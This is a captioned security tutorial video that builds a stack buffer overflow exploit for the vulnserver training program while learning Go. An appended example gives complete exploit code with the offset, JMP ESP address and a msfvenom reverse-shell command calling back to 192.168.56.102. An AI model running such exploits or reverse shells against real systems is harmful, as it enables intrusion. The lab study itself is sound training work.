Build A Buffer Overflow Exploit To Learn Golang - Project-Based Learning

Captions
Hey there everyone, greetings and welcome back to my cyber security show. Today we are going to have some fun learning Golang. That's right, for far too long have I pushed off any real programming knowledge. You know, I have learned a bit of Python, I know quite a bit of Bash, that does come in handy from time to time, but I've really been searching for that compiled language that's for me right now, and I think Golang might very well be that. I really regret not learning more programming in the beginning of my career; it's really kind of hindered me and now I'm having to play catch-up. So if you're starting off in IT or cyber security at all, I just highly recommend you go ahead and start learning something. Python is great, I love Python, I'll never not use Python, it's a phenomenal and fantastic language to learn. Golang, being a compiled language by nature, is something I'm really interested in as well, because I want to be able to build a binary that works no matter what. With Python, if they don't have Python installed, well then it doesn't run Python, right? But if I can build an EXE I can put it on Windows; if I can build an ELF file I can put it on Linux; I can build a Mac file and put it on macOS. So I just want to be able to work with just about anything and easily do that, so Golang seems to be my choice. I used to mess with Nim; we had a falling out, I'll just leave it there. Golang seems to be right along my kind of speed, so that's what I'm working with. I want to learn more about it, so I make a project, something I can get my hands on, focus me, get that buy-in internally. When I'm doing the thing, it's not just "here is a variable, enjoy the variable." Well, what do I do with a variable? What kind of stuff can you... "Shut up and hit the I-believe button and move on to the next thing." Okay, well, I need context, man. I need something that's going to make me interested in what we are doing, not just tell me there's a variable and then I'll eventually use it and hit the I-believe button. I just don't want to do that, I'm not that person. So I like to put projects in front of me that make me kind of focused in on things, and today that is going to be building a buffer overflow exploit for vulnserver. By the way, links for everything are down below for your enjoyment, or if you want to follow the bouncing ball and kind of play along.

So I've already got vulnserver installed, I've got Immunity Debugger installed, I've got Mona installed, all the things I need setup-wise for building a buffer overflow. Again, this episode isn't about how to build a buffer overflow, or how to do buffer overflows, or what buffer overflows are; I'm assuming that. It's "how can I do that using Golang?" That's what I want to see today, man. You might pick up a thing or two if you're new to that by just watching, but the intent is: what do I think about Golang, how cool was it to learn it, what's my learning process? Okay, so let's move on, let's get into this.

Now I've got a Windows 10 machine here and it is running the vulnerable software. You can see this right here: "this is vulnerable software, do not allow access from unrestricted systems," right? That was just a download. I also have Immunity, so if I need to do anything there, honestly it's pretty straightforward, but for right now I think we just need the server up and running. And then I have Parrot OS right here so that we can do the Golang stuff. You can install Go on Windows, but I'm a Linux guy, so there's that, you can't hate on me, right? I don't think I'm centered up, let me get me nice and centered here, there we go.

Okay, so ultimately I can connect to the server if I like, so let's do it here. If I do nc -nvl, no no no, -nv (so used to starting a server, not necessarily connecting to one), and then the IP address 192.168, was it 56.101 I believe, and the default port for the vulnerable server was 9999. Click that: "Welcome to Vulnerable Server." Excellent. I can type HELP, I see a bunch of commands. TRUN, right here, that is the one specifically we are going to be exploiting, so if you want to know a bit more about that you can look into it; there's plenty of online resources. I believe the people at, I think it's the Grey Corner, Stephen such-and-such, again links down below, they have walkthroughs and write-ups all over the internet. This is a very popular tool for learning. Okay, but I'm just going to type in EXIT at this point, and "Goodbye."

But what's going to be fun is, let me do sudo nc -nvlp on port 443, there we go. And if I do an ls you'll notice I've got these six files right here. Some of them are named very odd; they'll make more sense as we kind of move along, but ultimately we've got this exploit.go and that is the final stage, right? This is Goku in full Super Saiyan form, god mode, whatever they call it, where he's got the reddish-pink hair, or blue, I forget which one's more powerful. Anywho, that's the final thing, right? And if I run it with go run exploit.go, we see I get a shell. Oh, look at that, I can do dir and oh, it's so much fun, I've destroyed it, right? I'll exit out of there and clear this out. But how did I get there? That was cool. So I've built this in the past with Python. I thought this would be a great project for me to do with Go, and it was a bit of a learning curve going on there. I had to learn a few things about Go, but having those challenges, those puzzles to tickle my brain and make me go "I am dug into this, I want to know how the heck do I make that work, and why isn't this working, and why am I getting that error," and so on and so forth, right?

So let's start at the beginning, shall we? First thing I needed to do was learn how to make a network socket, and here is that code in all the glorious 24 lines of it. Ultimately, if you take out the spaces and some of the superfluous stuff, it's probably more like 20 lines of code, right? We've got package main; that's how you start your Go projects, at least from what I've learned so far. Still learning; if you're a Go programmer out there, feel free to chime in and explain some of the things that I don't understand quite yet. Happy to have that in the comments below, right? Buckle up. We're importing some things from the standard library, which are fmt (I think it's format, I'm not 100% sure what fmt stands for; I do know that Gophers, as they're referred to, refer to fmt as "font"), okay, and then we have net, which makes a little bit of sense.

Now how did I know to do that? It's called Google, ladies and gentlemen. I went to the Googs and I looked up, I can actually look and see what I looked up: "golang network programming docs." I Googled that, which took me to the Golang docs, and then I saw "standard library" and was like, probably in there. So I looked in the standard library and that took me to the net package; as I scrolled through I saw a package called net. Now we know what those are called: packages, yes, it says "package" in the standard library. This is where we are, this is the documentation that helped me learn this. By the way, their documentation is really good. So here's the overview: "Package net provides a portable interface for network I/O, including TCP" (ding ding), "UDP, domain name resolution, and Unix domain sockets. Although the package provides access to low-level networking primitives, most clients will need only the basic interface provided by the Dial, Listen, and Accept functions and the associated Conn and Listener interfaces. If you're using the crypto/tls package, it uses the same type of interface as the Dial and Listen functions." So since I only need to... I don't actually need to retrieve anything. If I wanted to make this more fully featured I would do that, so that I could catch the shell as well as send the exploit, but you know, netcat's a thing and that's fine. Again, I'm still learning, so one step at a time, baby steps, right? Baby steps into Golang, baby steps into network programming with Golang, baby steps.

So the Dial function was really all I needed. If we look, we have a lovely example right here, and you'll notice it's going to look a lot like this right here, right? Because we created our first function, the main function, which I think you need in Go. I'm just doing some printing here to give us some bannering, just make it pretty. But here, look, I've got this conn, err := net.Dial. There's the Dial thing that we were just looking at, right? What do they call that? They called it the interfaces, the Dial and Listener interfaces, and you'll see it is exactly the same, right, all the way up to here, because we're doing conn... was it, oh, I'm sorry, Dial is a function, Conn is the interface, right? So I've got conn, which is the interface; net.Dial, which is the function, which is built into net; I call on "tcp" and I tell it what I want to connect to, with either the name or the IP, colon, port I wish to connect to. Then I need to do some error handling, because we see this here: if err does not equal nil, which means there is an error, then you handle it in whatever way you see fit. For me I just saw fit to say "hey, there was an error connecting" and then print that error out using fmt.Println and just throw that error in there. So this is kind of a catch-all thing for those errors in this function; I just put that out and then just return.

And then after that I'll make, hey, fmt.Fprintf, which, as I learned, you can do this fun thing in Go, which is, I'll do it here: if I do go doc, I think it's doc or docs, and I do fmt.Fprintf, yeah, there we go, it tells you exactly what it does. So here it is: "w an io.Writer, format string, a any," you'll notice I can mess with integers and errors. "Formats according to a format specifier and writes to w. It returns the number of bytes written and any error encountered." Sorry, I can't read. So if we go back, you'll notice that that's what this was doing. It looks like it was sending a GET request and then handling anything that came back, but I didn't really need that part. But I did do a bit of it, because I wanted to send an EXIT and then just call it a day. So that's what I did: I sent the EXIT command and then Close, make sure that that connection was closed. Cool. And I learned all that by just reading through this documentation. I learned about Conn; if I do Ctrl-F "Conn," I think it's down the page a little bit, yeah, where is that, there it is, "type Conn," there you go, and I just read through this documentation. Look, there's Close: "Close closes the connection. Any blocked Read or Write operations will be unblocked and return errors." Close, what a bing, fairly simple. So that's all I needed from that, and then I was successful at creating a connection.

That moves us to actually doing something, right? This is where I needed to start fuzzing out the payload. Okay, I need to know where and if I can crash this thing to create a buffer issue. Obviously I needed a little bit more action going on here. Now we're obviously familiar with fmt and net, but I needed strings, I needed os, I needed strconv, and we can see I kind of highlighted why I needed these things with some comments. strings gives me the ability to repeat a string, so cool. I needed to repeat a string because I want to send a bunch of A's, but I don't want to type in a block of A's; I just want to say "here is the character, here's how many of the character I want you to send." Cool. Then I've got os, which gives me the ability to use command-line arguments, because when I fire this Go program off I want to tell it from the command line how many of the A characters I want to send. I don't want to have to hard-code that and then re-code it. I could go into looping and all that, but again, baby steps, right? Baby steps. This was an easier way to do it; I could just fire up the program and say "hey, send a thousand A's," or "send two thousand A's," or "send three thousand A's," until I found a crash, right? Because this is what I'm trying to do: see how much it can handle before it goes "you can't make partner, I'm going down, I see the light, there's Ma and Paw," you know, that kind of thing. And then strconv, for string convert: I needed to convert arguments from string to integers, because what was fun was that the command-line argument that I would send it was a number, and that number got interpreted as an integer by the... I'm sorry, as a string, even though it's a number. And so I needed to convert it from a string to an integer to do the formula, and we'll see that here.

Okay, so scrolling on down we can see there's my conn, right, all the same, good old good old, right? I'm doing "tcp," just slap the old IP colon port, there's our target. Basically I could define that elsewhere, but that was easy enough to do, it's not a big deal. And then down here is where we get into the fun stuff. So I did a variable called arg, and this colon-equals thing that I saw, I've realized that that is, hey, it's like a shorthand way of telling it "I'm giving you a variable, I'm going to let you figure out what kind of variable it is." And I'm taking os.Args and then I put inside of those brackets 1; that means the first argument after the program is called from the command line. That's going to be a command-line argument; take that one in. So it sucks it in, that's why I needed that os import. Then I've got intArg like this, and this is something that might be super weird to anybody like myself that was uninitiated. I saw this thing being used as underscore, especially when you had like conn, err; well, if I didn't care about the error I could just put an underscore there, and that's what's happening here. I do believe there's an error or something that went within arg that I didn't really care about, so I just put an underscore there, and it's just kind of like "okay, we're not going to deal with that." So instead of putting the second part of that... I could have done it's, you know, either side of that equation could have had that. And of course it is being treated as a variable, which is going to contain strconv.Atoi. Atoi stands for ASCII to integer, which is weird because we're kind of going the other way around, right? No... yes, yeah, no, not asking, we are doing ASCII, which is a string, to an integer, which is exactly what we need to do. And then I'm sucking in whatever got brought into arg; so there's the arg variable, bam, there it is. I'm converting it using Atoi, now I take that string of "1000," which was being treated as just like characters, it is now the number 1000, and I can use that to do math or other types of things.

So now here's my fuzz: strings.Repeat, it's the reason I needed the strings import, and there's my uppercase character A, and now intArg, which is my arg which has been turned into an integer. I feed that in and it can work with it, because before I was just doing the arg and it was like "hey, that's a string, I don't know, I can't multiply A by a string," and you're like "you're right, can't do that, that's pretty smart." Then I send the payload itself, or I make the payload, which is the TRUN command, which requires a period after the word TRUN with the space in between, and then I just concatenated the fuzz on the end of it, which is going to be the number of A's that I fed the thing, right? Finally, I send that payload along with the Fprintf statement and the conn and whatever my payload is, which will be coming from here, and then I can close the connection. Let's see what happens, shall we?

And basically what I was looking for is a crash condition. So if I run, I'll clear this and I'll do go run, and it is tcpsend.go, and if I give it like a thousand A's... it is not running, so there's an error, right? So my error is working; it tells me what the error was: the connection was refused. So obviously this isn't running, foolish boy. Let's try again, shall we? Firing off. All right, "connected to the target," we see the connection is there, it's still running, that's great, but that wasn't enough, obviously. Okay, let's try 2000 A's: "connected to the target," looks like it's still running, cool. Let's try 3000 A's: "connected to the target," oh, oh, crashy crashy crash crash. So there we go, I know that I need 3000 bytes, or at least somewhere around that. I'm not too worried about exactly A's right now, because vulnserver doesn't really, it's not too strange, you've got a lot of room to move and learn with. So 3000 bytes was enough for us to crash the program, and now I know that. So I've got that specific thing; now it's just kind of going along and building all the different things that I needed to make that work.

So let's see here, the next step in that thing was to find the EIP. The EIP is the extended... it's the register for the pointer, right? The pointer, what's the next thing that needs to run. I'm forgetting off the top of my head, I'm blanking out here on what EIP stands for; please don't roast me too hard for that, it's just not coming into the old brain today, it's like out of RAM. So let's see here, to find the EIP. I think there were some other things I wanted to show you, like how did I learn how to repeat the string. It was this article right here that helped me with that, kind of showed me that, and I think, yeah, here we go. I saw that I needed to get strings. Just Google searched "how to repeat a string," right? Not what I put in; "how to repeat a string with golang," I typed that into Google and the answer was forthcoming. So this person created a variable with a string in it, "Welcome to GeeksforGeeks," and then they wanted to repeat that, they would say strings.Repeat(string1, 4), so they would want to repeat that four times and it would repeat. So that's how I learned that. And then to learn how to do command-line arguments I did this one, which I did a Google search for "how to use command line arguments in golang." So I hope you're seeing that it doesn't have to be super difficult to start picking up new programming; you just have to know what it is you need to do and then start searching that out. Learning how to Google is a skill in and of itself, but it should be fairly simple. Some of them can be a little more elusive than others, but you'll get better at it as time progresses. This is how I kind of pick up these new things. So I've got that out of the way, and then how to convert a string to an integer type, which I'm going with "how to convert a string to int in golang" was the Google search, right? And then it shows me exactly how to do that, which was the Atoi, and there it was, all I needed, the strconv, and then they have this string variable of "100," and then we see, you'll notice it has an error with the Atoi, and then it changes that into an integer. I just underscored the error because I didn't care, I don't really need it, I don't want to deal with it; if I needed to I would. Okay, maybe that was a bad idea, but that's what I did.

All right, let's see here, back to programming things. Now I've got, I think, all the things I needed to figure stuff out; I just needed to work with it and start finding that EIP. Now to do that you're going to use the whole... what is it, what is the name of that stinking thing, and I just used it. My mind is blanking. If you ever have one of those days, it's one of those days where I'm like, my fuel isn't topped off or something and I'm just forgetting stuff. It is the offsets, right? Offset, right, pattern_create, that's what it is, just gotta engage the brain. So if I do find / -name, I'll look for pattern_create.rb and send all the errors to /dev/null. Where's that at? And this is a stock Parrot OS install, so you should have this as well; it's part of the Metasploit Framework, but there you go. If I run that pattern_create, so /usr/share/metasploit-framework (thank you) and then it was, or was it tools/exploit/pattern_create? Okay, tools/exploit/pattern_create.rb, and I tell it the length of 3000, bam, it's going to spit this junk out, right? And from there I can kind of put that in here, which is exactly what I did. I just made this the payload; I don't need all the other stuff at this point, I just made that the payload, because what I'm trying to do is find out where the EIP is picking up. So when I send a bunch of A's, that's cool, but what I need to know is where that EIP is hitting inside of that mass of A's. So I give this string, it's just a pattern, which is a completely unique string; I'll never have a repeating set of characters. That gives me the ability to find exactly where that was. I would then verify that by sending a bunch of B's along, right, and that's what we did here. You now see I created one called eip_bbb, and when I fire this off, I'm just repeating. I also create this NOP sled; NOP sleds are a really good idea when you're creating buffer overflows. So I just made, basically, like "hey, go to the next thing." That's what this instruction does, what a NOP does; it's like no instruction, it's just like "hey, go to the next thing, go to the next thing." So this \x90 is the hex character for doing that, and then I told it I want 16 of those, and then I created some padding, which is going to fill out the rest of the buffer so it continues to crash, you know, and I just kind of did the math and reduced what I took from here. I found this was at 2006. How did I know it was 2006? Well, I actually wrote that down; where did I put that? Oh, it's over here, I believe I wrote that down, didn't I? Ah, but I didn't keep it, right? Well, bummer. I wrote down that pattern; we could do it again, but it's just going to take up a lot of time, already at 25 minutes, right? So I just found that EIP spot, where exactly it was, and it was at 2006. You could do that by doing a pattern_offset.rb, tell it the length of 3000, and then you give it the actual characters, which, again, yes, I did not write those down. Man, I wish I'd written those down, but I did not; I don't have the file or anything. My bad, y'all, my bad. But again, the same about how to do buffer overflows: this is about doing it with Golang.

All right, so that's what all this business is, is like saying "hey, I've got a fuzz, which is a bunch of A's, do that 2006 times, and then I need a variable called eip which is going to have four B's in it." Cool. Then I need a NOP sled of 16 \x90 characters, there you go, fire that off, and then pad the rest of it with a bunch of uppercase C's. How many of those you want, killer? Well, I want 974 of them, please and thank you. You slap all that stuff together; here I am concatenating all that into the payload, right? So I've got TRUN, which is just a string, and its period that it requires, and let's use the plus character to grab fuzz, the plus character to add the eip, then to add the NOP sled, then to add the padding. That is now all wrapped up in the payload ball; I send that along, booyah, close it out, and I can check and see if I see that EIP in Immunity give me 42 42 42 42. That means I nailed it. If it's 41 42 42 42, then I'm off by a byte or two, well, actually by one; if I'm 42 42 42 something else, like a C, then I know that I've gone the wrong way, and I can kind of shift around until I get just the right piece. But those two commands, pattern_create and pattern_offset, are usually really good. You can also do what's called binary trees to figure this out, but it's a lot more involved; it's possible to do and it's good to learn, but it takes a lot more time.

Where does that take us? Well, now that I've verified the EIP, I have that, then run through Immunity looking for, using Mona, to figure out what is going to be a good memory address that will send to the right register. So when you have a... I'll bring you in closer to this one, I'll explore this and we'll call it a day. When you execute a command and you're running it through something like a debugger like Immunity, that EIP, remember I told you it tells you what to do next: "this is the next thing you should do, go here for your next set of instructions." Well, that gets filled with a memory address. If I have a memory address that tells the program "the next thing to do is at this memory address, or this register," then it will do that. Now, if through testing I've sent information into a register, and I know which register that is, which I can do with... you know what, let's just show you this, I think that's going to be the right thing to do.

So let's jump over here and let's fire up vulnserver. I'll run it as administrator, because why not, and then I'll run Immunity as administrator. Run as administrator, yes, let's do that. Whoa, CPU, you've gone nuts. And then I will do File, click Attach, we'll find vulnserver, click Attach, and then hit play, the little play button at the top. And now I will send that business, the last, what is it, eipverify.go, let's send that along and see what it does. So I will do go run eipverify.go, fire it off, and let's jump back to here. We notice we're in a paused state; things have gone horribly awry. For this, let me do Appearance, change the font size to something that we can all actually see, go to the biggest thing you've got, hit OK, hit OK. So you'll notice right around this region, I can't highlight it but it's right here, we've got the TRUN command; there's a bunch of A's in there. You'll notice here is EIP; you'll notice it says 42 42 42 42, the four B's that I sent along. And then if I go to the... you'll notice we've got the registers, right, we've got EAX, ECX, EDX, EBX, ESP, EBP, so on and so forth. If I click on this one... that one's not going to give it to me. Let's, help, if I go here and Follow in Dump, I can see that over here in the dump. I can scroll down, seeing all this action. I'm actually going to kind of slide this over, make sure that I am showing, yeah, 16, which is cool, it's just kind of big for this. You notice there's all those 41s; 41 is the ASCII character of the letter A. If I keep going, oh, look at that, I see a bunch of C's, and that should be in the ESP register. There you go, Follow in Dump, and you can see there's my NOP sled, which is first, right, 90 90, then 43 43 43, there's all those C's. So if I can control EIP, which I can because I know where it is, I can then say "hey, go to the ESP register." The command to do that is JMP ESP; that's the assembly code to say go to that register. Since I can control that, I can now control... and I would just need to find the memory address in which that code actually exists, to jump to ESP, which I did using Mona, and then I was able to do that. Okay, so let's kill this, let's bring up vulnserver yet again, there we go, and then we can come back to the code.

And that does take us to the actual exploit. So I needed to pull strings back in here because I needed the ability to repeat a string from time to time, because this is the final form. You're like "whoa, look at all that garbage, what's going on in here?" So here is that memory address written in hex in little-endian format, so it's actually kind of backwards. The memory address was 625011AF, so I put that in hex format, which is the \x character, right, and I do it backwards. So I give the EIP, now instead of four B's it is \xaf\x11\x50\x62. That's what you get there; nothing has changed there, and I just kind of commented out the old B's and said "thanks for your help, no longer needed." NOP is the same, but you'll notice the padding is a little bit different in the size of it, and that's because I created shellcode. I did that using Metasploit's msfvenom, right, and I believe all I did was, I will Ctrl-C this and clear, I believe I just did msfvenom -p for the payload, this is a windows/shell_reverse_tcp, LHOST equals my IP address 192.168.56.102, LPORT equals, I put it on 443 because I like to get fancy, and then I would do -f. Now, you can do a Golang payload, which I did try, but that didn't work because it's a bytes object and I'm trying to convert it; it just didn't work, it needs that hex-looking type of stuff. So I just outputted the format as C. I also added the bad character of \x00, like so; that's all you need for this one. Anything else for us there? I think that was about it. Fire it off and then it spits out your lovely code here momentarily. Waiting, waiting, waiting, wait, come on there, let's go, it does take a hot second. I guess I do have a lot going on on this computer, but I feel like it's almost at the station anyway. Once that actually works, oh, there it goes, there is that code. And I didn't technically copy-pasta this; I did run this through, because if you look at the code, everything has this plus at the end. I did some sed finagling to kind of format it nicer so I could just literally copy and paste it. So I think what I did was I ran it through sed and I just did a find and replace, I did the regular expression of, at the end of each line I wanted to add a space plus, but I think I needed to do space backslash plus; spaces and things might be considered special characters, so I'm just trying to remove any special characterization. Do that globally, fire it off again, and then it's going to take a second, it'll come back; it took a hot minute last time. Also, the other thing that I had to grab was how big it was, which was 351 bytes, and that's why when I look over here at the padding I had to lower it. So I just basically did all the math and removed the 351 bytes from the 900-whatever it was before; that left me with 623, making sure we still overflow. And then if we go back, hopefully it's now added all that stuff, yep, there it is, and that way I could just copy and paste that in.

Now one thing I did need to learn was how do I do a multi-line string, and there was a couple ways of doing it; backticks was one of them. Obviously I Googled this, I think I have that here: "how do you write a multi-line string." Stack Overflow came to the rescue, right, and this person is asking "hey, how do you do multi-line strings in golang," and this was the prevailing wind, as you can see, 1,329 upvotes and green check-marked by the questioner. But that didn't really work well for me; it was doing weird things, because I think it adds in some whitespace character stuff that you can't necessarily see. But below was another way to do it, which was this, and that worked perfectly for me. And I believe they even talk about how using backticks will preserve escape characters, but the plus we may be on the leading line, so on and so forth. So I was like, oh, okay, so there's something going on, because I was seeing these weird periods in the dump of Immunity, because it wasn't working. So that was the key to it right there, and that allowed me to create the shellcode variable and then just copy-pasta in there. Now I have parentheses around it; I did that accidentally, but it still works, so I just left it in. You don't mess with things that work. Then we build the payload, right: TRUN, fuzz, eip, NOP sled, shellcode, padding, fire and forget. And of course that brings us back to, it is waiting, where we can create our listener, so sudo nc -nvlp on 443, type in my password, I don't know if I did that right, hey, look at that, it's going. And then we do go run exploit.go, and bada bing, we get ourselves a shell.

And that, ladies and gentlemen, is how you learn some Golang, at least in my estimation. Hopefully that is helpful to you, maybe even motivating to get you out there: learn Python, learn Golang, learn C, learn PowerShell, learn Bash, learn anything. Get yourself familiar with the fundamentals of programming, pick a language, and just start using it. If you're deep into your IT career or cyber security career, it doesn't matter; it's never too late to go ahead and start learning this stuff. It becomes super useful, especially when you're doing things like web application pen testing, or "I need to build a tool that does something for me." It's super, super useful. So I highly recommend you just bite the bullet, figure out some projects that would be interesting to you, that you would want to build, like build something like a port scanner, or a host discovery thing. I don't care that those things already exist; they're just fun to build because you're invested, you kind of know how it's supposed to work, so you got that going on, now you just got to figure out the logic and how that works inside of the programming language which you have chosen. I like Golang, as you can see; it was pretty straightforward in a lot of ways, it wasn't too difficult for me to get this up and running. So hopefully that's a big burn, you're saddled to go use Golang, or use Python, or use whatever; that's what it is.

So if you liked what you saw, thanks for watching everyone. Click that like and subscribe down there; it really helps the channel, promotes it in the algorithm. Leave a comment, I love hearing "hey man, this was awesome, I'm gonna go learn a language today." Excellent. I'll even try to help you troubleshoot stuff if I can down in the comments; I try to comment with everybody that comments, so leave me a comment below, I love talking with you good folks. Got a Buy Me a Coffee link as well, so if you want to contribute and help me buy things like shirts and invest into the show, we can do that. That seems to be the end of it today. There you go, ladies and gents, thanks again for watching. We're gonna call it, until next time, keep hacking.
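Editor's added example (not the video's own tcpsend.go / eipverify.go / exploit.go, which are only shown on screen): one Go file that covers the three stages the video walks through, fuzzing with N A's, laying out fuzz | EIP | NOP sled | shellcode | padding at the 3000-byte crash length, and sending it over net.Dial. The offset 2006, the JMP ESP address 0x625011AF, the 16-byte NOP sled and the 3000-byte crash length are the values stated in the video; the function names, the fuzz/exploit command-line modes, the bad-character check and the 351-byte INT3 placeholder standing in for the msfvenom output are assumptions of this example. The return address is packed with encoding/binary so the little-endian reversal the video does by hand cannot be mistyped, and the payload builder takes an io.Writer so it can be exercised against a bytes.Buffer without a target.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
	"os"
	"strconv"
	"strings"
)

// Values taken from the video: TRUN command prefix, EIP offset from
// pattern_offset.rb, JMP ESP address from Mona, and the crash length from fuzzing.
const (
	trunPrefix  = "TRUN ."
	eipOffset   = 2006
	jmpESP      = uint32(0x625011AF)
	crashLength = 3000
	nopSledLen  = 16
)

// fuzzPayload is the tcpsend.go stage: TRUN followed by n copies of "A".
func fuzzPayload(n int) []byte {
	return []byte(trunPrefix + strings.Repeat("A", n))
}

// badCharIndex returns the index of the first shellcode byte in the bad list,
// or -1 if the shellcode is clean. The video excludes \x00 in msfvenom; this
// check (an addition) catches a paste that reintroduces it.
func badCharIndex(shellcode, bad []byte) int {
	var table [256]bool
	for _, b := range bad {
		table[b] = true
	}
	for i, b := range shellcode {
		if table[b] {
			return i
		}
	}
	return -1
}

// exploitPayload lays out fuzz | EIP | NOP sled | shellcode | padding, the same
// shape exploit.go concatenates by hand, and keeps the buffer at total bytes so
// the overflow still occurs after the shellcode is inserted.
func exploitPayload(offset int, retAddr uint32, shellcode []byte, total int) ([]byte, error) {
	if i := badCharIndex(shellcode, []byte{0x00}); i >= 0 {
		return nil, fmt.Errorf("shellcode contains bad char \\x00 at offset %d", i)
	}
	padLen := total - (offset + 4 + nopSledLen + len(shellcode))
	if padLen < 0 {
		return nil, fmt.Errorf("shellcode is %d bytes too large for a %d-byte buffer", -padLen, total)
	}
	var buf bytes.Buffer
	buf.WriteString(trunPrefix)
	buf.WriteString(strings.Repeat("A", offset)) // fuzz: reaches the saved EIP
	// 0x625011AF is emitted as \xaf\x11\x50\x62, the byte order the video writes by hand.
	if err := binary.Write(&buf, binary.LittleEndian, retAddr); err != nil {
		return nil, err
	}
	buf.Write(bytes.Repeat([]byte{0x90}, nopSledLen)) // NOP sled
	buf.Write(shellcode)                              // msfvenom output goes here
	buf.Write(bytes.Repeat([]byte{'C'}, padLen))      // padding to the crash length
	return buf.Bytes(), nil
}

// send writes the payload to any io.Writer (a net.Conn in main, a bytes.Buffer in tests).
func send(w io.Writer, payload []byte) error {
	n, err := w.Write(payload)
	if err != nil {
		return err
	}
	if n != len(payload) {
		return errors.New("short write")
	}
	return nil
}

func main() {
	if len(os.Args) < 3 {
		fmt.Fprintln(os.Stderr, "usage: exploit <host:port> fuzz [length] | exploit")
		os.Exit(1)
	}
	target, mode := os.Args[1], os.Args[2]
	var payload []byte
	var err error
	switch mode {
	case "fuzz":
		n := crashLength
		if len(os.Args) > 3 {
			if n, err = strconv.Atoi(os.Args[3]); err != nil { // string -> int, as in the video
				fmt.Fprintln(os.Stderr, "length must be an integer:", err)
				os.Exit(1)
			}
		}
		payload = fuzzPayload(n)
	case "exploit":
		// Placeholder shellcode (assumption): 351 INT3 bytes, the size of the video's
		// msfvenom payload. Replace with real msfvenom -f c output.
		shellcode := bytes.Repeat([]byte{0xCC}, 351)
		if payload, err = exploitPayload(eipOffset, jmpESP, shellcode, crashLength); err != nil {
			fmt.Fprintln(os.Stderr, err)
			os.Exit(1)
		}
	default:
		fmt.Fprintln(os.Stderr, "unknown mode:", mode)
		os.Exit(1)
	}
	conn, err := net.Dial("tcp", target)
	if err != nil {
		fmt.Println("Error connecting:", err)
		return
	}
	defer conn.Close()
	if err := send(conn, payload); err != nil {
		fmt.Println("Error sending payload:", err)
		return
	}
	fmt.Printf("Sent %d bytes to %s\n", len(payload), target)
}
```

Run as go run exploit.go 192.168.56.101:9999 fuzz 3000 for the crash stage and go run exploit.go 192.168.56.101:9999 exploit for the full layout; with the 351-byte placeholder the padding works out to the 623 C's the video arrives at by hand. A msfvenom -f c block pastes straight into a Go interpreted string (the "\xfc\xe8..." escapes are bytes in Go), joined with + exactly as the video does, with no backtick literal needed.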
Info
Channel: Daniel Lowrie
Views: 1,832
Keywords: ethicalhacking, pentesting, cybersecurity, kalilinux, linux, parrotsecurity, parrotlinux, hacking, hacker, bugbounty, owasp, owasptop10, webappsecurity, webapplicationsecurity, applicationsecurity, appsec, infosec, informationsecurity, learn, hackerone, bugcrowd, ethicalhacker, cybersec, ejpt, pentest, pentester, redteam, redteaming, blueteam, cti, powershell, golang, information security, application security, buffer overflow, programming, ethical hacking, ethical hacker, kali linux, parrot linux, parrot os, go
Id: c7hLUsUE_Ao
Length: 40min 1sec (2401 seconds)
Published: Fri Jun 09 2023